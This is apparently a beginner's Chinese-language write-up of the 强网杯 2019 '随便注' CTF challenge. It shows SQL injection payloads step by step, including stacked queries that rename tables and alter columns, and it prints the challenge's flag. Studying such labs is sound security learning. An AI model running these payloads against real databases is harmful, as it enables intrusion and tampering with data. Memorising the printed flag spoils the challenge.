小白一个,写给自己看。
打开后是这样。
从题目和内容来看就是一道sql注入题。
输入
1' or 1=1;#
这个#用来注释掉后面的sql语句
显示所有数据,这个数据有什么用我也不知道,但sql注入一般第一步就是这样看看有没有有用的信息(没有)。
输入
1' order by 2;#
1' order by 3;#
到第3列报错,说明只显示两列。
输入1'; show tables;#
可以看到有 1919810931114514 和 words 两个表
进入看看有什么
输入
0'; show columns from `words`;#
0'; show columns from `1919810931114514`;#
表名首尾有 ` 这个符号。在键盘左上角,也可以写出波浪线~。
可以看到words表里有两个属性,即两列:id 和data
而1919810931114514表里只有一个属性列
说明输入框可能查询的就是words表
后台sql语句可能为
select id,data from words where id=
接下来就是如何获取flag了
思路是把1919810931114514表改名为words表,把属性名flag改为id,然后用1’ or 1=1;# 显示flag出来
在这之前当然要先把words表改名为其他
payload:
1';rename table `words` to words2;
rename table `1919810931114514` to `words`;
alter table words change flag id varchar(100);
show tables;
show columns from words;#
后面两句可以不用写,改完再查也行。
最后用1' or 1=1;#
求出flag
flag{f4eb1a89-3469-42e2-a90b-3378585a5039}
参考
[强网杯 2019]随便注 1
SQL Injection8(堆叠注入)——强网杯2019随便注
这是篇写给自己的日记,因为只有自己写得出来而且能让读者看懂才能是真的明白了。写之前我以为我是明白的,写完后才算是真正明白了,写这就是个融会贯通的过程。
这里说明一些细节过程。在show tables show columns from ··· 前可以(或者说必须的?)show databases; 如果显示出数据证明存在堆叠注入,简单来说就是这个; 分号后可以写和执行其他语句的意思。
参考里的1' union select 1,2;#后显示
过滤掉的这些语句有什么用?我不明白,有这没这好像关系不大8?可能sql注入的题做的不多,看的市面不广的原因现在还不太懂。难道这是用rename和alter的原因吗?如果可以用这些过滤的语句那么该如何解题呢?